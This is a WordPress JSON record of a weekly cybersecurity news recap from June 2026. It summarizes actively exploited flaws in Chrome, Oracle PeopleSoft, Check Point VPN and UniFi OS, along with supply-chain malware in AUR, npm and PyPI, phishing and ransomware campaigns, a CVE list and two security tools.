{"id":1193,"date":"2026-06-15T15:34:01","date_gmt":"2026-06-15T15:34:01","guid":{"rendered":"https:\/\/cybercolombia.co\/index.php\/2026\/06\/15\/chrome-0-day-unifi-exploits-macos-stealers-vpn-flaw-and-more-cyberdefensa-mx\/"},"modified":"2026-06-15T15:34:01","modified_gmt":"2026-06-15T15:34:01","slug":"chrome-0-day-unifi-exploits-macos-stealers-vpn-flaw-and-more-cyberdefensa-mx","status":"publish","type":"post","link":"https:\/\/cybercolombia.co\/index.php\/2026\/06\/15\/chrome-0-day-unifi-exploits-macos-stealers-vpn-flaw-and-more-cyberdefensa-mx\/","title":{"rendered":"Chrome 0-Day, UniFi Exploits, macOS Stealers, VPN Flaw and More \u2013 CYBERDEFENSA.MX"},"content":{"rendered":"<div id=\"articlebody\">\n<p>Stuff broke again. Not in a movie way. An old tool was left exposed. An abandoned package was abused. A deprecated feature was still running in prod.<\/p>\n<p>This week is the same lesson in a new form: phishing kits are easier to rent, AI names are useful bait, old login paths still fail, and forgotten software keeps becoming someone else\u2019s entry point.<\/p>\n<p>Scroll through the full Monday Cybersecurity Recap below for the news, tools, webinars, and fixes worth your time this week.<\/p>\n<h2 style=\"text-align: left;\"><b>\u26a1 Threat of the Week<\/b><\/h2>\n<p><b>Google Patches Actively Exploited Chrome 0-Day <\/b>\u2013 Google released security updates to address 74 vulnerabilities, including one that has come under active exploitation in the wild. The high-severity vulnerability, tracked as CVE-2026-11645 (CVSS score: 8.8), has been described as an out-of-bounds memory access in V8, Chrome\u2019s JavaScript and WebAssembly engine. Google acknowledged that an \u00abexploit for CVE-2026-11645 exists in the wild,\u00bb but stopped short of sharing additional specifics to ensure that a majority of the users are updated with a fix and to prevent further exploitation. Google has addressed a total of five actively exploited Chrome zero-days since the start of the year. This includes CVE-2026-2441, CVE-2026-3909, CVE-2026-3910, and CVE-2026-5281.<\/p>\n<h2 style=\"text-align: left;\"><b>\ud83d\udd14 Top News<\/b><\/h2>\n<ul>\n<li><b><a href=\"https:\/\/thehackernews.com\/2026\/06\/shinyhunters-exploits-oracle-peoplesoft.html\">ShinyHunters Gang Exploits Oracle PeopleSoft Zero-Day <\/a><\/b>\u2013 The ShinyHunters (aka UNC6240) extortion crew exploited an unpatched flaw in Oracle PeopleSoft (CVE-2026-35273, CVSS score: 9.8) to break into enterprise networks. The vulnerability relates to a missing authentication for a critical function that could allow an unauthenticated attacker to obtain takeover of PeopleSoft Enterprise PeopleTools. According to Google Mandiant, the exploitation activity was observed between May 27 and June 9, 2026. Following a successful compromise, the attackers have been observed conducting targeted internal reconnaissance using MeshCentral, lateral movement, and data exfiltration. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has <a href=\"https:\/\/www.cisa.gov\/news-events\/alerts\/2026\/06\/12\/cisa-adds-one-known-exploited-vulnerability-catalog\">added<\/a> the flaw to its Known Exploited Vulnerabilities (<a href=\"https:\/\/www.cisa.gov\/known-exploited-vulnerabilities-catalog\">KEV<\/a>) catalog, giving Federal Civilian Executive Branch (FCEB) agencies until June 15, 2026, to apply the fixes. The campaign has mainly targeted the higher education sector; 68% of the more than 100 notified organizations were universities and colleges. \u00abThe observed exploitation targeted PeopleSoft\u2019s Environment Management Hub (PSEMHUB) endpoints, and data stolen during the campaign was published on the ShinyHunters Data Leak Site (DLS) on June 9, 2026,\u00bb Rapid7 <a href=\"https:\/\/www.rapid7.com\/blog\/post\/etr-active-exploitation-of-oracle-peoplesoft-zero-day-cve-2026-35273\/\">said<\/a>.<\/li>\n<li><b>100s of Arch Linux Packages Compromised to Push Rootkit and Steale<\/b>r \u2013 Unknown threat actors have <a href=\"https:\/\/discourse.ifin.network\/t\/400-aur-packages-compromised-with-infostealer-and-rootkit\/577\">managed<\/a> to compromise hundreds of legitimate-but-abandoned packages in the Arch User Repository (AUR) and modify them with preinstall scripts that download and execute a malicious npm package called atomic-lockfile. The campaign has been codenamed Atomic Arch by Sonatype. \u00abAnalysis of atomic-lockfile, the malicious dependency, found a bundled Linux payload with functionality tied to credential harvesting, stealth, anti-debugging, and potential data exfiltration,\u00bb the company said. Although the initial number of affected packages was 400, it has since <a href=\"https:\/\/lists.archlinux.org\/archives\/list\/aur-general@lists.archlinux.org\/thread\/FGXPCB3ZVCJIV7FX323SBAX2JHYB7ZS4\/\">risen to over 1,500<\/a>. As of June 12, 2026, Arch Linux developers have <a href=\"https:\/\/lists.archlinux.org\/archives\/list\/aur-general@lists.archlinux.org\/message\/FCH7TT6IOVT7D477JKSVJALBKADAARSW\/\">deleted<\/a> all the malicious commits they are aware of.<\/li>\n<li><b>Outside PhaaS Enterprise Taken Down <\/b>\u2013 The U.S. Federal Bureau of Investigation said it took down a number of domains linked to Outsider, a Chinese phishing-as-a-service (PhaaS) software kit behind an estimated 3,870,000 stolen credit cards and a corresponding estimated $1.9 billion in losses since July 2023. In tandem, Google said it pursuing legal action against the operators, who weaponized Gemini to \u00abhelp generate fraudulent phishing pages and deploy massive SMS phishing (\u2018smishing\u2019) attacks, often through text messages impersonating legitimate brands, alerting recipients of \u2018brokerage account issues\u2019 or insisting they are eligible for \u2018rewards through their mobile phone carrier.\u00bb According to a complaint filed by Google, the group \u00abbuilt, maintains, and uses a turn-key, online software suite that enables criminals, regardless of technical skill, to publish fraudulent websites designed to rob victims and enrich themselves.\u00bb The toolkit costs $88 per week or $200 per month, offering access to more than 290 pre-built templates that mimic legitimate websites. The goal is to steal passwords and corresponding multi-factor authentication codes, as well as financial information in real-time. \u00abPart of the Outsider software\u2019s appeal is the ease with which someone with limited technical expertise -like many members of the Enterprise \u2013 can purchase the software, execute various phishing attacks, and, upon purchase, meet other members of the Enterprise who are proficient in other areas,\u00bb the tech giant added.<\/li>\n<li><b>Critical Check Point VPN Flaw Exploited in Limited Attacks<\/b> \u2013 Check Point warned of active exploitation of a critical vulnerability CVE-2026-50751 (CVSS score: 9.3) impacting Remote Access VPN and Mobile Access deployments that are configured to use the deprecated IKEv1 key exchange protocol. The security flaw is a case of a logic flow weakness in certificate validation that allows an unauthenticated remote attacker to bypass user authentication and establish a remote access VPN connection without a valid user password. The Israeli cybersecurity company said it first observed indications of suspicious activity on June 4, 2026, with the earliest observed exploitation dating back to May 7, 2026. Exploitation efforts are said to have ramped up starting this month. The exploitation activity, Check Point added, has been limited to a \u00abfew dozen targeted organizations globally.\u00bb In one case, the post-exploitation phase has been associated with a Qilin ransomware affiliate.<\/li>\n<li><b>The Gentlemen Ransomware Claims 478 Victims<\/b> \u2013 A new analysis of The Gentlemen operation revealed that the financially motivated threat group initially operated as an affiliate responsible for conducting double extortion attacks, while leveraging resources from various ransomware-as-a-service (RaaS) schemes like LockBit (aka Tenacious Mantis), Qilin (aka Pestilent Mantis), and Medusa (aka Venomous Mantis). The group, which it tracks as Phantom Mantis, is led by a Russian-speaking cybercriminal it calls LARVA-368, who goes by the online aliases hastalamuerte, ArmCorp, zeta88, nobody0, and santamuerte. The Gentlemen is known to be active since March 2025, claiming a total of 478 victims to date. Microsoft, which is tracking the cluster under the moniker Storm-2697, said the operation \u00abinitially started as a closed ransomware group then began offering its RaaS to affiliates in September 2025.\u00bb<\/li>\n<\/ul>\n<p><b>\u200e\ud83d\udd25 Trending CVEs<\/b><\/p>\n<p>Bugs drop weekly, and the gap between a patch and an exploit is shrinking fast. These are the heavy hitters for the week: high-severity, widely used, or already being poked at in the wild.<\/p>\n<p>Check the list, patch what you have, and hit the ones marked urgent first \u2013 CVE-2026-11645 (Google Chrome), CVE-2026-50751 (Check Point Remote Access VPN and Mobile Access), CVE-2026-35273 (Oracle PeopleSoft), CVE-2026-5027 (Langflow), CVE-2026-44963 (Veeam Backup &amp; Replication), CVE-2026-23111 (<a href=\"https:\/\/fuzzinglabs.com\/repro-cve-2026-23111\/\">Linux kernel<\/a>), <a href=\"https:\/\/openssl-library.org\/news\/vulnerabilities\/index.html#CVE-2026-45447\">CVE-2026-45447<\/a> (OpenSSL), <a href=\"https:\/\/support.sap.com\/en\/my-support\/knowledge-base\/security-notes-news\/june-2026.html\">CVE-2026-44748, CVE-2026-27671<\/a> (SAP NetWeaver AS ABAP and ABAP Platform), <a href=\"https:\/\/support.sap.com\/en\/my-support\/knowledge-base\/security-notes-news\/june-2026.html\">CVE-2026-22732<\/a> (SAP Commerce Cloud and SAP Data Hub), <a href=\"https:\/\/support.sap.com\/en\/my-support\/knowledge-base\/security-notes-news\/june-2026.html\">CVE-2026-40128<\/a> (SAP NetWeaver Application Server Java Web Container), <a href=\"https:\/\/hub.ivanti.com\/s\/article\/Security-Advisory-Ivanti-Sentry-CVE-2026-10520-CVE-2026-10523?language=en_US\">CVE-2026-10520<\/a> (Ivanti Sentry), <a href=\"https:\/\/claroty.com\/team82\/research\/turning-up-the-heat-hacking-trane-hvac-controllers\">CVE-2026-28252, CVE-2026-28253, CVE-2026-28254, CVE-2026-28255, CVE-2026-28256<\/a> (Trane Tracer SC+ HVAC controller), <a href=\"https:\/\/claroty.com\/team82\/research\/attacking-ups-network-cards-to-take-down-data-centers\">CVE-2025-46412, CVE-2025-41426<\/a> (Vertiv Liebert IS-UNITY-DP network cards), <a href=\"https:\/\/security.paloaltonetworks.com\/CVE-2026-0274\">CVE-2026-0274<\/a> (Palo Alto Networks Cortex XSOAR and Cortex XSIAM), <a href=\"https:\/\/advisory.splunk.com\/advisories\/SVD-2026-0603\">CVE-2026-20253<\/a> (Splunk Enterprise), <a href=\"https:\/\/kb.cert.org\/vuls\/id\/862559\">CVE-2026-9648<\/a> (Haskell TLS software stack), <a href=\"https:\/\/chromereleases.googleblog.com\/2026\/06\/stable-channel-update-for-desktop_01962725236.html\">from CVE-2026-12007 through CVE-2026-12011<\/a> (Google Chrome), <a href=\"https:\/\/orca.security\/resources\/blog\/cve-2026-45034-phpspreadsheet-rce-patch-bypass\/\">CVE-2026-45034<\/a> (PhpSpreadsheet), <a href=\"https:\/\/pentest-tools.com\/research\/phpbb-authentication-bypass\">PTT-2026-004, PTT-2026-005<\/a>, an <a href=\"https:\/\/www.aikido.dev\/blog\/phpbb-authentication-bypass-rce\">authentication bypass vulnerability<\/a> (<a href=\"https:\/\/www.phpbb.com\/community\/viewtopic.php?t=2672170\">phpBB<\/a>), and a <a href=\"https:\/\/github.com\/wazuh\/wazuh\/security\/advisories\/GHSA-ff9g-85jq-r3g3\">maximum-severity code injection vulnerability<\/a> in Wazuh (no CVE).<\/p>\n<h2 style=\"text-align: left;\"><b>\ud83c\udfa5 Expert Webinars<\/b><\/h2>\n<ul>\n<li><a href=\"https:\/\/thehacker.news\/validate-automated-pentesting\">Find Out What Your Automated Pentest Is Missing Before Attackers Do<\/a> \u2192 Automated pentesting is useful. It is also easy to overread. A tool that proves an exploit path worked does not prove your SIEM saw it, your EDR reacted, or your team could respond before damage spread. This webinar cuts through that gap: what automated pentesting actually validates, why repeat runs start returning fewer useful findings, and how BAS helps show which controls failed, not just which vulnerabilities exist.<\/li>\n<li><a href=\"https:\/\/thehacker.news\/outpacing-mythos-cyberattacks\">Stop AI-Speed Attacks Before Your Legacy Controls Catch Up<\/a><b> \u2192 <\/b>AI has changed the pace of cyberattacks. Lures get sharper, campaigns adapt faster, and attackers can test what works before defenders finish investigating. This webinar breaks down how AI-powered threats like Mythos get in, move, and scale, then shows how to fight back with tighter access, reduced attack surface, blocked lateral movement, and in-line controls that stop risky behavior before it becomes an incident.<\/li>\n<li><a href=\"https:\/\/thehacker.news\/securing-ai-use\">Stop Employees From Leaking Source Code, Contracts, and PII Into AI Tools<\/a> \u2192 Employees are already pasting company data into AI tools. Source code, contracts, customer records, and internal notes can leave the business through one prompt. This webinar shows how to move from after-the-fact detection to real-time prevention, with browser-level controls that stop risky AI use at the point where data is about to leak.<\/li>\n<\/ul>\n<h2 style=\"text-align: left;\"><b>\ud83d\udcf0 Around the Cyber World<\/b><\/h2>\n<ul>\n<li><b>Campaigns Use AI Brands as Lures <\/b>\u2013 Microsoft warned of campaigns capitalizing on the global interest around artificial intelligence (AI) as a social engineering lure in campaigns. \u00abThese campaigns, which don\u2019t represent compromise of services, span phishing, malvertising, and search engine optimization (SEO)-driven attacks that ultimately lead to credential theft, financial fraud, or malware infection,\u00bb the company <a href=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2026\/06\/08\/ai-brands-as-bait-how-threat-actors-are-using-the-ai-hype-in-social-engineering\/\">said<\/a>. Some of the campaigns include a ChatGPT-themed lure that leads to a phishing kit collecting credit card data, a Claude-themed phishing campaign collecting credentials and access tokens, an \u00abAwesome AI Windows Plugin\u00bb malvertising campaign deploying Vidar Stealer, and Fake DeepSeek V4 installers on GitHub delivering Vidar Stealer. The tech giant said it \u00abobserved the initial access broker Storm-3075 employing AI-themed malvertising to deliver payloads, including malware signed by the malware-signing-as-a-service (MSaaS) offering attributed to the financially motivated threat actor Fox Tempest, on behalf of multiple downstream actors.\u00bb<\/li>\n<li><b>macOS Users Targeted by Fake Installers <\/b>\u2013 Deceptive installers for popular software are being used to push information stealers to macOS users. \u00abThe infection chain almost always starts inside a web browser,\u00bb Huntress <a href=\"https:\/\/www.huntress.com\/blog\/deceptive-installers-macos-infostealers\">said<\/a>. \u00abThreat actors lean heavily on search engine optimization (SEO) poisoning to hijack search results, or they seed compromised links across torrent networks and cracked software forums. A user drops their guard, clicks the malicious link, and downloads what they assume is an authentic installer.\u00bb The DMG files, once executed, aim to bypass Apple Gatekeeper protections to realize their goals. In 2024, more than 65% of newly reported macOS malware was classified as infostealers.<\/li>\n<li><b>History of Chinese-Language Guarantee Marketplaces <\/b>\u2013 Flare has shed light on the \u00abguarantee model\u00bb that powers various illicit online Telegram marketplaces like HuiOne Guarantee and Tudou Guarantee. \u00abThese marketplaces are third-party escrow services for illicit transactions,\u00bb security researcher Chris d\u2019Eon <a href=\"https:\/\/flare.io\/learn\/resources\/blog\/prehistory-chinese-language-guarantee-marketplaces\">explained<\/a>. \u00abThe marketplace operator stands between buyer and seller, holds the buyer\u2019s funds in escrow, releases them to the seller only when the buyer confirms delivery, and adjudicates disputes when something goes wrong. In return, the operator collects deposits from vendors who want to advertise under its brand, fees on transactions, and revenue from paid promotional slots.\u00bb The model, which has its roots in legitimate Chinese consumer-internet trust architecture launched by Alipay in 2003, facilitates the sale of money laundering services, stolen data, fraud kits, fake identity documents, recruitment for scam compounds, retail fraud, deepfake services, and the physical infrastructure that drives human trafficking and forced-labour compounds. Law enforcement crackdown has led to \u00abfragmentation but not elimination\u00bb of the criminal enterprise. More than 30 successor marketplaces have emerged following the takedown of HuiOne and Xinbi, almost all of them managing their operations via Telegram owing to its reach, bot infrastructure, and <a href=\"https:\/\/www.trmlabs.com\/resources\/blog\/huione-guarantee-and-xinbi-still-operating-on-telegram-despite-ban-underscoring-illicit-actors-persistence\">improved resilience<\/a> despite the platform\u2019s efforts to crack down on such activities. These include Tiancheng, Dabai, Ouyi, Yinuo, Jin Bo, Haihua, Timi, and Lao Niu.<\/li>\n<li><b>UniFi OS Flaws Exploited <\/b>\u2013 The UniFi OS Server remote code execution chain, comprising CVE-2026-34908, CVE-2026-34909, and CVE-2026-34910, is now being actively exploited, according to <a href=\"https:\/\/x.com\/DefusedCyber\/status\/2064238751258178006\">Defused Cyber<\/a>, following a <a href=\"https:\/\/bishopfox.com\/blog\/popping-root-on-unifi-os-server-unauthenticated-rce-chain-detection-analysis\">report from Bishop Fox<\/a> about how the three flaws could be combined to achieve unauthenticated code execution as root. The attacks culminated in the deployment of commodity malware.<\/li>\n<li><b>Khmer Shadow Targets Cambodian Government Entities <\/b>\u2013 A targeted cyber espionage campaign against Cambodian government entities has leveraged a meeting-themed SFX archive to sideload a custom C++ loader dubbed NIGHTFORGE, which then decrypts and executes a Havoc Demon payload in memory. \u00abNIGHTFORGE has demonstrated a moderate level of sophistication, combining advanced defense-evasion techniques such as NTDLL unhooking and Hell\u2019s Gate syscall resolution, a method that enables direct system calls and helps evade user-mode monitoring, with operational shortcomings that suggest the tool is still under active development,\u00bb Acronis <a href=\"https:\/\/www.acronis.com\/en\/tru\/posts\/behind-khmer-shadow-targeted-espionage-against-cambodian-government-entities\/\">said<\/a>. The activity has been attributed to any known threat group, but it\u2019s \u00ablikely aligned with regional intelligence collection interests in Southeast Asia.\u00bb<\/li>\n<li><b>How Attackers Could Exploit Cloud Logging Services <\/b>\u2013 Palo Alto Networks Unit 42 has <a href=\"https:\/\/unit42.paloaltonetworks.com\/cloud-logging-defense-evasion\/\">warned<\/a> that threat actors could exploit cloud logging services, which are crucial for security monitoring, to \u00abcreate weak spots, evade detection, and in certain scenarios, establish continuous visibility within a target\u2019s environment.\u00bb Attackers could tamper with resources within the cloud logging service (e.g., disabling, altering, or deleting logs, or even impairing logging) to hide their presence or attempt to route logs to their own accounts, establishing continuous visibility over the victim\u2019s environment, performing continuous discovery, and passively monitoring all activity.<\/li>\n<li><b>Operation TaxShadow Delivers Multi-Stage Malware Framework <\/b>\u2013 An Indian tax-themed phishing campaign has been observed delivering a sophisticated multi-stage malware framework through a mix of social engineering, phishing infrastructure, and memory-resident malware execution techniques. \u00abThe campaign begins with a fraudulent tax notification email impersonating an official Indian tax authority, leveraging government branding, urgency-based messaging, and compliance-related threats to manipulate victims into interacting with a malicious phishing website,\u00bb CYFIRMA <a href=\"https:\/\/www.cyfirma.com\/research\/operation-taxshadow-multi-region-tax-phishing-in-memory-malware-campaign\/\">said<\/a>. \u00abVictims are subsequently instructed to download a malicious ZIP archive containing three staged payload components: \u0915\u0930 \u0935\u093f\u0935\u0930\u0923.exe, SbieDll.dll, and SbieDll.bin, which collectively establish the complete infection lifecycle.\u00bb The attack makes use of a highly modular malware architecture, coupled with advanced defense-evasion and anti-analysis techniques, to launch a payload in memory. The malware also establishes persistent WebSocket-based communications.\n<div class=\"separator\" style=\"clear: both;\"><a href=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhZJ844MIql-z7-z1mmrkX21WamSWBiYRA9pldIoCnDPjAKbO4_y73pxEVJeAwIKrTB0SN91WkVEh4uYGpN5ctF46iOldNYo3HKhTyn5-Bt1E9rN744KZ7ykKxZMhzW6f-Rwr3dkhNchgoVIogpHDw_8PwuOxsa15oCI37Wcnee2vl6FHrES0y8at9iBkub\/s1700-e365\/ph.jpg\" style=\"display: block;  text-align: center; clear: left; float: left;\"><img decoding=\"async\" src=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhZJ844MIql-z7-z1mmrkX21WamSWBiYRA9pldIoCnDPjAKbO4_y73pxEVJeAwIKrTB0SN91WkVEh4uYGpN5ctF46iOldNYo3HKhTyn5-Bt1E9rN744KZ7ykKxZMhzW6f-Rwr3dkhNchgoVIogpHDw_8PwuOxsa15oCI37Wcnee2vl6FHrES0y8at9iBkub\/s1700-e365\/ph.jpg\" alt=\"\" border=\"0\" data-original-height=\"388\" data-original-width=\"806\"\/><\/a><\/div>\n<\/li>\n<li><b>MagicAd Displays Background Ads on Android Devices <\/b>\u2013 A new Android trojan called MagicAd has been found to bypass operating system restrictions to display background ads. \u00abOne of these methods is universal, while the others are designed for devices from specific manufacturers,\u00bb Russian cybersecurity company Doctor Web <a href=\"https:\/\/news.drweb.com\/show\/?i=15262&amp;lng=en&amp;c=9\">said<\/a>. \u00abThese include exploiting third-party software and using the system media player.\u00bb The malware is distributed via apps on GetApps, the official app catalog for Xiaomi devices. It has been discovered in more than 50 games and apps. The campaign is assessed to have commenced in 2025, with the threat actors behind it also leveraging the Samsung Galaxy Store as a distribution mechanism. Currently, none of the apps are available for download.<\/li>\n<li><b>Residential Proxies in the Wild <\/b>\u2013 Residential proxies are designed to relay internet traffic through devices that belong to regular consumers, such as home routers, mobile devices, IoT devices, and devices with applications embedded with proxyware. One way this is achieved is that application developers themselves can embed software development kits (SDKs) provided by the residential proxy networks into their products as a way to monetize their software, allowing them to receive a small amount of money on each installation. In an analysis published last week, Infoblox said monthly queries to residential proxy domains steadily grew from nearly 400 billion to over 500 billion between January 2025 and April 2026 across its customer base, an increase of about 25%. \u00abThere are likely several explanations for this: certainly, the rise in AI-related training, which often requires scraping websites, is a major driver of residential proxy demand,\u00bb it <a href=\"https:\/\/www.infoblox.com\/blog\/threat-intelligence\/residential-proxies-in-the-wild\/\">said<\/a>. \u00abResidential proxies bypass many anti-scraping measures, as the traffic appears to be coming from the devices of real people.\u00bb Some of the most commonly observed proxy services queried include Bright Data, Hola VPN, Oxylabs Proxy, Honeygain, and Grass. The DNS threat intelligence firm said many residential proxy services operate in a grey space.<\/li>\n<li><b>SHEET#CREEP Drops C# Remote Access Trojan <\/b>\u2013 An ongoing cyber espionage campaign dubbed SHEET#CREEP has leveraged a diplomatic-themed ISO phishing lure to distribute a C# remote access trojan (RAT). The activity was previously flagged by Zscaler and Bitdefender, attributing it to a threat actor known as Transparent Tribe. \u00abThe RAT abuses the Google Sheets API as its command-and-control (C2) channel, authenticating via an embedded GCP service account private key and using individual spreadsheet tabs per victim for bidirectional communication,\u00bb Securonix researchers Shikha Sangwan, Akshay Gaikwad, and Aaron Beardslee <a href=\"https:\/\/www.securonix.com\/blog\/sheetcreep-evolved-google-sheets-rat\/\">said<\/a>. \u00abThe LNK triggers a C# dropper that extracts a bait PDF, drops the RAT payload into the Windows Vault directory, and establishes persistence through a scheduled task, before melting (self-deleting) to remove forensic traces.\u00bb The cybersecurity company said it identified 91 active victim tabs in the C2 spreadsheet, including a high-confidence target located in Pakistan.<\/li>\n<li><b>Malware Distributed via npm and PyPI Packages <\/b>\u2013 A cryptocurrency-focused software supply chain campaign has used malicious npm packages to facilitate credential harvesting, wallet theft, remote payload delivery, and blockchain-based command-and-control. \u00abTechnical analysis uncovered capabilities including cryptocurrency wallet interception, private key and mnemonic phrase theft, SSH credential harvesting, environment variable collection, sensitive file discovery, remote activation mechanisms, blockchain-based infrastructure retrieval, and multi-stage malware deployment,\u00bb CYFIRMA <a href=\"https:\/\/www.cyfirma.com\/research\/new-npm-supply-chain-campaign-identified-a-multi-stage-cryptocurrency-malware-with-more-than-2-7-million-downloads\/\">said<\/a>. A second campaign, codenamed <a href=\"https:\/\/research.jfrog.com\/post\/solana-fakefix\/\">Solana FakeFix<\/a>, has targeted Solana developers with 20 bogus npm and PyPI packages to steal wallet keys, cloud credentials, source-control tokens, SSH keys, and environment secrets, while a third campaign, CMS Windows Loader, has used five npm packages to load remote executables and JavaScript code dynamically. In a related development, two versions of the dbmux npm package (2.2.5 and 1.0.5) were flagged for containing malware. \u00abAny computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer,\u00bb according to a <a href=\"https:\/\/research.jfrog.com\/post\/solana-fakefix\/\">GitHub advisory<\/a>. \u00abThe package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.\u00bb<\/li>\n<li><b>Ransomware Attack Uses Easyupload.io for Data Exfiltration <\/b>\u2013 In one ransomware attack investigated by Huntress, a threat actor accessed the victim\u2019s hypervisor and created a new virtual machine (VM) as a staging location from which they launched the Akira ransomware. The threat actor rapidly progressed through the attack, disabling Microsoft Defender and installing WinRAR, an archival tool typically used by threat actors for staging data. \u00abThe threat actor used the Microsoft Edge browser to access Bing, and search for the term \u2018eayupload\u2019 before settling on Easyupload.io, a website that provides access to file uploads via drag-and-drop,\u00bb the cybersecurity company <a href=\"https:\/\/www.huntress.com\/blog\/akira-ransomware-limewire-data-exfiltration\">said<\/a>. \u00abShortly after accessing the LimeWire website, presumably to exfiltrate staged archives, the threat actor launched the akira.exe file encryptor against several mounted shares.\u00bb<\/li>\n<\/ul>\n<h2 style=\"text-align: left;\"><b>\ud83d\udd27 Cybersecurity Tools<\/b><\/h2>\n<ul>\n<li><a href=\"https:\/\/github.com\/trustedsec\/spoonmap\">SpooNMAP<\/a> \u2192 It is a Python tool that wraps Nmap and Masscan to make port scanning easier and faster. It guides users through scan options, supports small, medium, large, full, and custom scans, can grab service banners with Nmap, and lets users scan target IPs or CIDR ranges from a file.<\/li>\n<li><a href=\"https:\/\/github.com\/mukul975\/cve-mcp-server\">CVE MCP Server<\/a> \u2192 It connects Claude to 27 security intelligence tools across 21 data sources, helping analysts look up CVEs, check EPSS and CISA KEV status, find PoCs, scan dependencies, review IP reputation, and generate risk reports from one place.<\/li>\n<\/ul>\n<p><i>Disclaimer: This is strictly for research and learning. It hasn\u2019t been through a formal security audit, so don\u2019t just blindly drop it into production. Read the code, break it in a sandbox first, and make sure whatever you\u2019re doing stays on the right side of the law.<\/i><\/p>\n<h2 style=\"text-align: left;\"><b>Conclusion<\/b><\/h2>\n<p>This week\u2019s lesson is simple: attackers do not need magic. They need old code, busy teams, weak defaults, and one forgotten box nobody wants to claim.<\/p>\n<p>That is the uncomfortable part. The next big incident may already be sitting in your stack, quietly working as designed.<\/p>\n<\/div>\n","protected":false},"excerpt":{"rendered":"<p>Stuff broke again. Not in a movie way. An old tool was left exposed. An abandoned package was abused. A deprecated feature was still running in prod. This week is the same lesson in a new form: phishing kits are easier to rent, AI names are useful bait, old login paths still fail, and forgotten [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":1194,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[25,5],"tags":[305,17,24,144,2822,422,3115,1117,866],"class_list":["post-1193","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-noticias","category-trending","tag-0day","tag-chrome","tag-cyberdefensa-mx","tag-exploits","tag-flaw","tag-macos","tag-stealers","tag-unifi","tag-vpn"],"_links":{"self":[{"href":"https:\/\/cybercolombia.co\/index.php\/wp-json\/wp\/v2\/posts\/1193","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/cybercolombia.co\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/cybercolombia.co\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/cybercolombia.co\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/cybercolombia.co\/index.php\/wp-json\/wp\/v2\/comments?post=1193"}],"version-history":[{"count":0,"href":"https:\/\/cybercolombia.co\/index.php\/wp-json\/wp\/v2\/posts\/1193\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/cybercolombia.co\/index.php\/wp-json\/wp\/v2\/media\/1194"}],"wp:attachment":[{"href":"https:\/\/cybercolombia.co\/index.php\/wp-json\/wp\/v2\/media?parent=1193"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/cybercolombia.co\/index.php\/wp-json\/wp\/v2\/categories?post=1193"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/cybercolombia.co\/index.php\/wp-json\/wp\/v2\/tags?post=1193"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}